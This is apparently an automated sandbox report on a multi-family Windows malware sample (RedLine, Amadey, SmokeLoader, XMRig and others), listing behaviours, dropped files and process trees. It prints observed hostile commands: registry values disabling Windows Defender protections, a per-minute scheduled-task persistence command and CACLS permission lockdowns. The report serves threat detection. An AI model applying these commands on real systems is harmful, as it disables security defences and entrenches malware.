Malware Analysis Report

2024-10-24 19:58

Sample ID 231104-hjl97sch71
Target af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe
SHA256 af9e55e83d026cf03000fa394257145ef2bd4860aa5a7dc9ff95509fb294e246
Tags
amadey glupteba healer redline sectoprat smokeloader xmrig kedru livetraffic pixelnew2.0 plost up3 backdoor paypal discovery dropper evasion infostealer loader miner persistence phishing rat spyware stealer trojan upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

af9e55e83d026cf03000fa394257145ef2bd4860aa5a7dc9ff95509fb294e246

Threat Level: Known bad

The file af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe was found to be: Known bad.

Malicious Activity Summary


RedLine

SmokeLoader

Healer

RedLine payload

Detects Healer, an antivirus disabler dropper

SectopRAT

Glupteba

Glupteba payload

Modifies Windows Defender Real-time Protection settings

SectopRAT payload

xmrig

Amadey

XMRig Miner payload

Stops running service(s)

Blocklisted process makes network request

Modifies Windows Firewall

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

UPX packed file

Checks computer location settings

Windows security modification

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand paypal.

Suspicious use of SetThreadContext

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Creates scheduled task(s)

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-04 06:46

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-04 06:46

Reported

2023-11-04 06:48

Platform

win10v2004-20231020-en

Max time kernel

77s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe"

Signatures

Amadey

trojan amadey

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\rundll32.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\3528.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\45C5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350690463-3549324357-1323838019-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\74E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\B58.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2tQ708mV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3528.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3EDF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45C5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\e8b5234212\Utsysc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\74E.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Detected potential entity reuse from brand paypal.

phishing paypal

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4492 set thread context of 668 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 6676 set thread context of 6840 N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3EDF.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\45C5.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Broom.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4548 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe
PID 2836 wrote to memory of 3368 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe
PID 2836 wrote to memory of 964 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe
PID 964 wrote to memory of 4076 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe
PID 4548 wrote to memory of 756 N/A C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe
PID 4076 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Windows\SysWOW64\schtasks.exe
PID 4076 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 4988 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 2308 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 4728 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 2644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2172 wrote to memory of 4516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 2172 wrote to memory of 2224 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3096 wrote to memory of 3528 N/A N/A C:\Users\Admin\AppData\Local\Temp\74E.exe
PID 3528 wrote to memory of 4256 N/A C:\Users\Admin\AppData\Local\Temp\74E.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe
PID 3096 wrote to memory of 2560 N/A N/A C:\Windows\system32\cmd.exe
PID 4256 wrote to memory of 1896 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe
PID 3096 wrote to memory of 3152 N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1896 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe
PID 5104 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe
PID 3096 wrote to memory of 4036 N/A N/A C:\Users\Admin\AppData\Local\Temp\B58.exe
PID 4956 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe

Processes

C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe

"C:\Users\Admin\AppData\Local\Temp\af9e55e83d026cf03000fa394257145ef2bd4860aa5a7.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v1106597.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a3425420.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\b8792114.exe

C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe

"C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c5767668.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\Admin\AppData\Local\Temp\925e7e99c5\pdates.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "pdates.exe" /P "Admin:N"&&CACLS "pdates.exe" /P "Admin:R" /E&&echo Y|CACLS "..\925e7e99c5" /P "Admin:N"&&CACLS "..\925e7e99c5" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "pdates.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "pdates.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\925e7e99c5" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\925e7e99c5" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\74E.exe

C:\Users\Admin\AppData\Local\Temp\74E.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL6Vq3Gs.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\IV8Mi7xd.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\943.bat" "

C:\Users\Admin\AppData\Local\Temp\A4E.exe

C:\Users\Admin\AppData\Local\Temp\A4E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rn6yR5BK.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\zB5ux2gh.exe

C:\Users\Admin\AppData\Local\Temp\B58.exe

C:\Users\Admin\AppData\Local\Temp\B58.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Wu99NZ4.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 668 -s 540

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fff35c646f8,0x7fff35c64708,0x7fff35c64718

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2tQ708mV.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2tQ708mV.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 668 -ip 668

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,9008711190030245416,2527976111560978251,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,9008711190030245416,2527976111560978251,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1992 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2020,403383630516863929,8679515635207013333,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

